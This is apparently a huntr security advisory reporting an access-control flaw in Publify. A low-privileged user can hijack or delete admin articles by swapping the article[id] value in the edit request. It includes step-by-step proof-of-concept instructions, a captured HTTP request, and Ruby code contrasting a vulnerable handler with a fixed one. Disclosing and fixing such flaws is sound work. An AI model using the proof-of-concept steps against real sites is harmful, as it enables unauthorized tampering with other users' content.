huntr / ninj4c0d3r / 9B2D7579-032E-42DA-B736-4B10A868EACB
History: May 20, 2022 - 12:29 a.m.

Improper Access Control - Articles

2022-05-20 00:29:53
ninj4c0d3r
www.huntr.dev
improper access control
low-privileged user
admin articles
hijacking
parameter manipulation
security vulnerability

EPSS

0.001

Percentile

21.4%

Description

A low-privileged user can modify and delete articles owned by an admin simply by changing the value of the article[id] parameter in the edit/save request to the id of the admin's article; the server does not verify that the article named in the body belongs to the requesting user.

Proof of Concept

  • Step 1 - Authenticated as an unprivileged user, create a new article

  • Step 2 - Click Edit article

  • Step 3 - Intercept the request and save your article

  • Step 4 - In the intercepted request, change the value of the article[id] parameter to the id of an admin article (you can obtain the id by copying the edit link of that article)

  • Step 5 - Submit the request; the admin article is overwritten with your content (hijacked). Note that the path id in the request below is the attacker's own article, while the id in the body is the admin's.

POST /admin/content/5850 HTTP/1.1
Host: demo-publify.herokuapp.com
Cookie: _publify_blog_session=cookie
Content-Length: 2234
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://demo-publify.herokuapp.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBydp1QV5GIbVRQBU
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
...
------WebKitFormBoundaryBydp1QV5GIbVRQBU
Content-Disposition: form-data; name="article[id]"

ID_ARTICLE_ADMIN_HERE
------WebKitFormBoundaryBydp1QV5GIbVRQBU
Content-Disposition: form-data; name="article[title]"

hacked
------WebKitFormBoundaryBydp1QV5GIbVRQBU
Content-Disposition: form-data; name="article[body_and_extended]"

hacked
------WebKitFormBoundaryBydp1QV5GIbVRQBU
Content-Disposition: form-data; name="article[keywords]"
...
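The access-control failure behind the PoC, as an added example in plain Ruby (not Publify's code): the request above edits the attacker's own article in the URL path, but the body carries a different article[id]. The block below simulates a save handler that authorizes against the path id and then applies every submitted attribute, including id, next to a hardened handler that drops id from the permitted attributes and only writes the record named in the path. That this mirrors the actual root cause in Publify is an assumption; the names Article, User, seed_repo, vulnerable_update, hardened_update and replay_hijack are invented for the illustration, and the sample data is constructed.

```ruby
# Added illustration, not Publify's code. Models the "edit article" flow
# with an in-memory repo; names and data are assumptions for the example.

Article = Struct.new(:id, :owner, :title, :body)
User    = Struct.new(:name, :admin)

# Constructed sample data: article 1 belongs to admin, article 2 to "alice".
def seed_repo
  {
    1 => Article.new(1, "admin", "Welcome", "admin body"),
    2 => Article.new(2, "alice", "Draft", "alice body"),
  }
end

# Vulnerable flow: the record is looked up by the path id, which the
# attacker legitimately owns, so the ownership check passes. Every
# submitted attribute is then applied, and a submitted article[id]
# retargets the write to a different record that was never authorized.
def vulnerable_update(repo, user, path_id, params)
  article = repo[path_id]
  return :not_found unless article
  return :forbidden unless user.admin || article.owner == user.name

  attrs  = params.fetch("article")
  target = repo[attrs["id"].to_i] || article   # write redirected by body id
  target.title = attrs["title"] if attrs["title"]
  target.body  = attrs["body"]  if attrs["body"]
  :ok
end

# Hardened flow: article[id] is not a permitted attribute, so the body
# cannot choose which record is written; the only record touched is the
# one named in the path, which is the one the ownership check covered.
PERMITTED = %w[title body].freeze

def hardened_update(repo, user, path_id, params)
  article = repo[path_id]
  return :not_found unless article
  return :forbidden unless user.admin || article.owner == user.name

  attrs = params.fetch("article").slice(*PERMITTED)  # "id" is discarded
  article.title = attrs["title"] if attrs["title"]
  article.body  = attrs["body"]  if attrs["body"]
  :ok
end

# Replays the report's PoC against one implementation: alice saves her own
# article (path id 2) with article[id] set to the admin's article (1).
# Returns [status, admin article title, alice article title].
def replay_hijack(impl)
  repo   = seed_repo
  alice  = User.new("alice", false)
  params = { "article" => { "id" => "1", "title" => "hacked", "body" => "hacked" } }
  status = send(impl, repo, alice, 2, params)
  [status, repo[1].title, repo[2].title]
end

if __FILE__ == $PROGRAM_NAME
  p replay_hijack(:vulnerable_update)  # [:ok, "hacked", "Draft"]
  p replay_hijack(:hardened_update)    # [:ok, "Welcome", "hacked"]
end
```

The same two rules close the delete path the description mentions: resolve the record from the authenticated user's own scope (or the path id that was checked), and never let a client-supplied id in the body select the target.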

Demo

https://drive.google.com/file/d/1OymOxmRG-B2p0DD0ZcFUyJiwx_k-NVGf/view?usp=sharing
